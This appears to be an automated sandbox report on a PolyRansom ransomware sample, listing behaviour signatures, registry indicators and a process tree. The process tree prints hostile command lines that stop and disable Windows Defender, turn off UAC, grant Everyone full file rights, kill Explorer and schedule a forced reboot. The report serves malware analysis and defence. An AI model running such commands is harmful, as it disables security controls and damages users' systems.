Analysis Overview
SHA256
a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6
Threat Level: Known bad
The file Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe was found to be: Known bad.
Malicious Activity Summary
Mimikatz
Troldesh, Shade, Encoder.858
BadRabbit
Modifies WinLogon for persistence
mimikatz is an open source tool to dump credentials on Windows
Checks for common network interception software
Enumerates VirtualBox registry keys
Stops running service(s)
UPX packed file
Disables Task Manager via registry modification
Disables RegEdit via registry modification
Modifies Windows Firewall
Executes dropped EXE
Downloads MZ/PE file
Modifies file permissions
Themida packer
Loads dropped DLL
Checks computer location settings
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Modifies WinLogon
Checks installed software on the system
Writes to the Master Boot Record (MBR)
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
NSIS installer
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Views/modifies file attributes
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Modifies Internet Explorer start page
Modifies Control Panel
Suspicious use of SetWindowsHookEx
System policy modification
Kills process with taskkill
Creates scheduled task(s)
Suspicious use of UnmapMainImage
Suspicious use of SendNotifyMessage
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-29 12:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-29 12:38
Reported
2022-09-29 12:40
Platform
win7-20220812-en
Max time kernel
32s
Max time network
155s
Command Line
Signatures
BadRabbit
Mimikatz
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Troldesh, Shade, Encoder.858
Checks for common network interception software
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
mimikatz is an open source tool to dump credentials on Windows
Executes dropped EXE
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Stops running service(s)
UPX packed file
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Themida packer
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\antiviruspc2009\libltdl3.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009\libltdl3.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\antiviruspc2009\__tmp_rar_sfx_access_check_7109121 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\antiviruspc2009\bzip2.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009\bzip2.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009\avpc2009.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Program Files (x86)\antiviruspc2009 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\cscc.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dispci.exe | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\__tmp_rar_sfx_access_check_7108169 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Windows\antivirus-platinum.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\antivirus-platinum.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Windows\MSCOMCTL.OCX | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Windows\302746537.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\infpub.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\infpub.dat | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Windows\COMCTL32.OCX | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\COMCTL32.OCX | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\MSCOMCTL.OCX | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File opened for modification | C:\Windows\302746537.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\[email protected] |
NSIS installer
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (binary certificate blob not shown) | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\WINDOWS\302746537.exe
"C:\WINDOWS\302746537.exe"
C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM explorer.exe
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Delete /F /TN rhaegal
C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe
"C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 386111685 && exit"
C:\ProgramData\IIwkMYAg\wqccYwoU.exe
"C:\ProgramData\IIwkMYAg\wqccYwoU.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:56:00
C:\Windows\9DB7.tmp
"C:\Windows\9DB7.tmp" \\.\pipe\{5D983210-E07A-4516-81E0-21DD0A2D9431}
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QWQgYkUo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 152
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\Fantom.exe
"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Users\Admin\AppData\Local\Temp\ose00000.exe
"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AC18.tmp\302746537.bat" "
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /pid 1692 & ping -n 3 127.1 & del /f /q "C:\Users\Admin\AppData\Local\Temp\[email protected]" & start C:\Users\Admin\AppData\Local\xeozppms.exe -f
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\is-DD3U8.tmp\is-2Q9DL.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DD3U8.tmp\is-2Q9DL.tmp" /SL4 $20190 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 386111685 && exit"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:56:00
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /F /TN rhaegal
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\saMkQEcw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\cmd.exe
cmd /c 154151664462343.bat
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\fwUcoUQE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s c:\windows\comctl32.ocx
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RYwAQMsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\@[email protected]
"C:\Users\Admin\AppData\Local\Temp\@[email protected]"
C:\Program Files (x86)\VAV\vav.exe
"C:\Program Files (x86)\VAV\vav.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /pid 1692
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\@[email protected]
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Roaming\lflesb.exe
C:\Users\Admin\AppData\Roaming\lflesb.exe
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
"C:\Users\Admin\AppData\Local\Temp\taskdl.exe"
C:\Users\Admin\AppData\Local\Temp\ose00000.exe
"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"
C:\Users\Admin\AppData\Local\Temp\Fantom.exe
"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 152
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\taskse.exe
"C:\Users\Admin\AppData\Local\Temp\taskse.exe"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
